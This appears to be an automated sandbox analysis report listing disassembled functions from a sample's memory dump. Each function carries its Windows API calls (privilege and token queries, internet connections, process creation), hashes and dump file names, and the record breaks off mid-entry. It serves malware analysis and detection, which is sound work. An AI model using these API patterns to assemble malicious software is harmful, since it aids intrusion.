API String ID: 2864067406-0
Opcode ID: 66513f052d54dd661c91526966db89e688b29fbce0695d8b2b8659ae68de6c59
Instruction ID: 856e3285d117c9695c242e2feb7c973aa0fcf55aaf0c16df6d31420bbe8f30d3
Opcode Fuzzy Hash: 66513f052d54dd661c91526966db89e688b29fbce0695d8b2b8659ae68de6c59
Instruction Fuzzy Hash: 6C316B35601018AFCB15CF59C898FEE7BBAFB49310F0440A9F9158B2A1D7359A51DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C18B9E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C18652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C18669
Part of subcall function 00C18652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C18673
Part of subcall function 00C18652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18682
Part of subcall function 00C18652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C18689
Part of subcall function 00C18652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C1869F

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C18BEB
_memcmp.LIBCMT ref: 00C18C0E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C18C44
HeapFree.KERNEL32(00000000), ref: 00C18C4B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: c10e4c779a5b2cf48b7d879aa1b40b89759554ddf20cb682eaf6c1e06234c81d
Instruction ID: 0ab2041ef294695531c6c1b329c1036724e720a956d1032b18521327502639ef
Opcode Fuzzy Hash: c10e4c779a5b2cf48b7d879aa1b40b89759554ddf20cb682eaf6c1e06234c81d
Instruction Fuzzy Hash: D7219F71E05208EFCB00CF94C954BEEB7F8FF41344F148059E964A7240DB30AA4ADBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BE0BD0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00BE0BF2

Part of subcall function 00BC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27B20,?,?,00000000), ref: 00BC5B8C
Part of subcall function 00BC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27B20,?,?,00000000,?,?), ref: 00BC5BB0

_fprintf.LIBCMT ref: 00BE0C29
OutputDebugStringW.KERNEL32(?), ref: 00C16331

Part of subcall function 00BE4CDA: _flsall.LIBCMT ref: 00BE4CF3

__setmode.LIBCMT ref: 00BE0C5E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: c105dfc35d212b1fe10d5673ec2141df730f5767eebce70d487fd9105ab5dad5
Instruction ID: ea91c602c3bc2feb81e0aeb396c439f862d20f876103302388d4792d4733f699
Opcode Fuzzy Hash: c105dfc35d212b1fe10d5673ec2141df730f5767eebce70d487fd9105ab5dad5
Instruction Fuzzy Hash: ED1124329042446EDB14B7B6AC86EBE7BE9DF42320F2401DAF114572D2DF605DC693A5

Uniqueness

Uniqueness Score: -1.00%

Function 00C31A5B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C31A97

Part of subcall function 00C31B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C31B40
Part of subcall function 00C31B21: InternetCloseHandle.WININET(00000000), ref: 00C31BDD

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 9eae1dd7ff3a1f0ce50c8707328b6f40cfd81ac96673754e5ed58cd0926e753f
Instruction ID: 0e02ca92d06d6573ecc9e783dbd805f3a6a8bde57bd6db77b86a7fb7dc7a4aef
Opcode Fuzzy Hash: 9eae1dd7ff3a1f0ce50c8707328b6f40cfd81ac96673754e5ed58cd0926e753f
Instruction Fuzzy Hash: 4421DE75210600BFEB129F60CC01FBBBBADFF49715F18002AFE5196650EB31E911ABA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C1E1AF Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1F5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00C1E1C4,?,?,?,00C1EFB7,00000000,000000EF,00000119,?,?), ref: 00C1F5BC
Part of subcall function 00C1F5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00C1F5E2
Part of subcall function 00C1F5AD: lstrcmpiW.KERNEL32(00000000,?,00C1E1C4,?,?,?,00C1EFB7,00000000,000000EF,00000119,?,?), ref: 00C1F613

lstrlenW.KERNEL32(?,00000002,?,?,?,?,00C1EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C1E1DD
lstrcpyW.KERNEL32(00000000,?), ref: 00C1E203
lstrcmpiW.KERNEL32(00000002,cdecl,?,00C1EFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00C1E237

Strings

cdecl, xrefs: 00C1E22E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 347fd60092095360b61c93759ee79c2febf66390fe5ca6d128b6b0722fc5663c
Instruction ID: 9f75b147aa1c68a4622177c856b423b9c34c54387161a2707fc9a9ab900d0cf6
Opcode Fuzzy Hash: 347fd60092095360b61c93759ee79c2febf66390fe5ca6d128b6b0722fc5663c
Instruction Fuzzy Hash: 1411933A200345EFCB25AF64DC55EBA77A9FF46350B44402AF816CB260EB71D991E790

Uniqueness

Uniqueness Score: -1.00%

Function 00BF5332 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BF5351

Part of subcall function 00BE594C: __FF_MSGBANNER.LIBCMT ref: 00BE5963
Part of subcall function 00BE594C: __NMSG_WRITE.LIBCMT ref: 00BE596A
Part of subcall function 00BE594C: RtlAllocateHeap.NTDLL(01510000,00000000,00000001,00000000,?,?,?,00BE1013,?), ref: 00BE598F

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 8cc665e1dfa8f29a22aeb2718257400055a7335f96d7e89efbe871e0d5f8adc1
Instruction ID: f49140155702ecd7e2c2a44264de704571adc0e9d4f5e1e450f6fbce5c05e397
Opcode Fuzzy Hash: 8cc665e1dfa8f29a22aeb2718257400055a7335f96d7e89efbe871e0d5f8adc1
Instruction Fuzzy Hash: 3A110132404A1AAECB302F79AC4476E37D8AF113A0F1044AEFB4A9B1A1DB7189409398

Uniqueness

Uniqueness Score: -1.00%

Function 00BC4531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BC4560

Part of subcall function 00BC410D: _memset.LIBCMT ref: 00BC418D
Part of subcall function 00BC410D: _wcscpy.LIBCMT ref: 00BC41E1
Part of subcall function 00BC410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BC41F1

KillTimer.USER32(?,00000001,?,?), ref: 00BC45B5
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BC45C4
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00BFD6CE

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 2340f8d0fea3229a23440813588c864d0e2ee9fe1d9e880bee9943a14c494a48
Instruction ID: 6ab514ec55c93dee5b843f4e4c141bb9faa65508b48e5bb8a72f54aaf313499b
Opcode Fuzzy Hash: 2340f8d0fea3229a23440813588c864d0e2ee9fe1d9e880bee9943a14c494a48
Instruction Fuzzy Hash: A921C570904798AFEB328B249895FFBBBEDEF11304F0400DDE69E97241C7B45A899B51

Uniqueness

Uniqueness Score: -1.00%

Function 00C3667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C27B20,?,?,00000000), ref: 00BC5B8C
Part of subcall function 00BC5B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C27B20,?,?,00000000,?,?), ref: 00BC5BB0

gethostbyname.WSOCK32(?,?,?), ref: 00C366AC
WSAGetLastError.WSOCK32(00000000), ref: 00C366B7
_memmove.LIBCMT ref: 00C366E4
inet_ntoa.WSOCK32(?), ref: 00C366EF

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: ee2c8f4ca7be390eb77bf239455d9fa53f3dd6c9edf8ecd09d8c2d9bd74e48cc
Instruction ID: aebd0000429d2891a68a303725e053995790154d1ac984af619bfa1b4fe90f55
Opcode Fuzzy Hash: ee2c8f4ca7be390eb77bf239455d9fa53f3dd6c9edf8ecd09d8c2d9bd74e48cc
Instruction Fuzzy Hash: D6112E35500509AFCB04EBA5DD86EEEB7B8BF15310B1440A9F506A71A2DF31AE44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C19023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00C19043
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C19055
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C1906B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00C19086

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 6255e08d9d583bcc99fce2b3e596d27a6bc06a91fa7549233dbadc06838884fe
Instruction ID: 7149ebcaf27cd57bbfdafe6bff3e6f8786d7407808b18ddadf648ffc36041f04
Opcode Fuzzy Hash: 6255e08d9d583bcc99fce2b3e596d27a6bc06a91fa7549233dbadc06838884fe
Instruction Fuzzy Hash: F4113A79901218BFDB10DFA5C884EDDBB74FB49310F204095EA04B7250D6726E50EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BC1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623

DefDlgProcW.USER32(?,00000020,?), ref: 00BC12D8
GetClientRect.USER32(?,?), ref: 00BFB84B
GetCursorPos.USER32(?), ref: 00BFB855
ScreenToClient.USER32(?,?), ref: 00BFB860

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 15f00e1c00d345a6b4c0152c3a102a1f815b3ba69386c86106dd0aebc3170fdf
Instruction ID: a9d65a9b8f7dcadf19c017cf2dd70c1d125f59e80354cc260c6633c472ba0bad
Opcode Fuzzy Hash: 15f00e1c00d345a6b4c0152c3a102a1f815b3ba69386c86106dd0aebc3170fdf
Instruction Fuzzy Hash: D2110D39900019AFDB10EF98D885EFE77F8FB06301F100899F951E7151C730BA569BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C21652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C201FD,?,00C21250,?,00008000), ref: 00C2166F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00C201FD,?,00C21250,?,00008000), ref: 00C21694
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00C201FD,?,00C21250,?,00008000), ref: 00C2169E
Sleep.KERNEL32(?,?,?,?,?,?,?,00C201FD,?,00C21250,?,00008000), ref: 00C216D1

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 8047aab5be426f88c3d152cdb5f0b464cc5394048a21b786655220fc0ce17152
Instruction ID: 0704bc3abb84afbeebaf86283c36d79ec8aa6f64613c6a2e56696b0b967bbc7f
Opcode Fuzzy Hash: 8047aab5be426f88c3d152cdb5f0b464cc5394048a21b786655220fc0ce17152
Instruction Fuzzy Hash: 0D115A35C1052DD7CF009FA6E849BEEBB78FF19711F094059ED40B2240CB3056A08B96

Uniqueness

Uniqueness Score: -1.00%

Function 00BF7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00BF722B

Part of subcall function 00BF7912: __fltout2.LIBCMT ref: 00BF793B

__cftog_l.LIBCMT ref: 00BF7251
__cftoe_l.LIBCMT ref: 00BF7283

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 931bd55e50f4dff17d083704d4f0dec564ebd18483d5a3f3e8cba4b4e4838aef
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 1001403608414EBBCF125E84DC41CEE3FA2FF5A351B588595FB185A031DA37C9B9AB81

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C4B59E
ScreenToClient.USER32(?,?), ref: 00C4B5B6
ScreenToClient.USER32(?,?), ref: 00C4B5DA
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4B5F5

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 712c966438a0824b9b82285d79de45205f9c76fcee161db16ee7ce80a7103058
Instruction ID: 711583baf44989b81e804e721ad162a656a6d04ed139e59b4692e9e27c5fb2c4
Opcode Fuzzy Hash: 712c966438a0824b9b82285d79de45205f9c76fcee161db16ee7ce80a7103058
Instruction Fuzzy Hash: 7E1146B9D00209EFDB41CF99D444AEEFBF5FB09310F104166E914E3220D735AA558F50

Uniqueness

Uniqueness Score: -1.00%

Function 00C4B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4B8FE
_memset.LIBCMT ref: 00C4B90D
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C87F20,00C87F64), ref: 00C4B93C
CloseHandle.KERNEL32 ref: 00C4B94E

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 95bf079152748dad54eb6343431d110693bf330fc109a4bf3c8af0a7085c8d49
Instruction ID: 6358c52a9abad03b11889356dd03afdc09674d8b2200104bce243c4099f0de81
Opcode Fuzzy Hash: 95bf079152748dad54eb6343431d110693bf330fc109a4bf3c8af0a7085c8d49
Instruction Fuzzy Hash: C6F082F2544310BBF6102BA6AC49FBF3A9CEB09758F100164BB08D61A2E771CD1187AC

Uniqueness

Uniqueness Score: -1.00%

Function 00C26E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00C26E88

Part of subcall function 00C2794E: _memset.LIBCMT ref: 00C27983

_memmove.LIBCMT ref: 00C26EAB
_memset.LIBCMT ref: 00C26EB8
LeaveCriticalSection.KERNEL32(?), ref: 00C26EC8

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 52454de5f3c0687827b596e1b5c57f14f2bb043a097c3ac20aed28b349060188
Instruction ID: e8a604eba72e6681f26b20312f823965a62e593b8616ba435f6c84dafbb0226c
Opcode Fuzzy Hash: 52454de5f3c0687827b596e1b5c57f14f2bb043a097c3ac20aed28b349060188
Instruction Fuzzy Hash: 2AF05E3A200210ABCF116F55EC85B8EBB6AEF45320B0480A5FE085F22BC771A951DBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00C4C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00BC12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BC134D
Part of subcall function 00BC12F3: SelectObject.GDI32(?,00000000), ref: 00BC135C
Part of subcall function 00BC12F3: BeginPath.GDI32(?), ref: 00BC1373
Part of subcall function 00BC12F3: SelectObject.GDI32(?,00000000), ref: 00BC139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C4C030
LineTo.GDI32(00000000,?,?), ref: 00C4C03D
EndPath.GDI32(00000000), ref: 00C4C04D
StrokePath.GDI32(00000000), ref: 00C4C05B

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C75000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447736326.0000000000C7F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447754746.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_150-425-2024.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: c6aa8f883554e773ac707a43a8c53fadcbff3890386a4127a066dc607907f38b
Instruction ID: f32500814a5f3ede490ffdbb79824081d227618656951202aed4973ae421ff4b
Opcode Fuzzy Hash: c6aa8f883554e773ac707a43a8c53fadcbff3890386a4127a066dc607907f38b
Instruction Fuzzy Hash: 86F05E35101259BBDB226F54AC0DFDE3F99BF06311F044014FA15650E287B55A52DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00C1A37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C1A399
GetWindowThreadProcessId.USER32(?,00000000), ref: 00C1A3AC
GetCurrentThreadId.KERNEL32 ref: 00C1A3B3
AttachThreadInput.USER32(00000000), ref: 00C1A3BA

Memory Dump Source

Source File: 00000000.00000002.1447654041.0000000000BC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true

Associated: 00000000.00000002.1447637454.0000000000BC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447697028.0000000000C4F000.00000002.00000001.01000000.00000003.sdmpDownload File
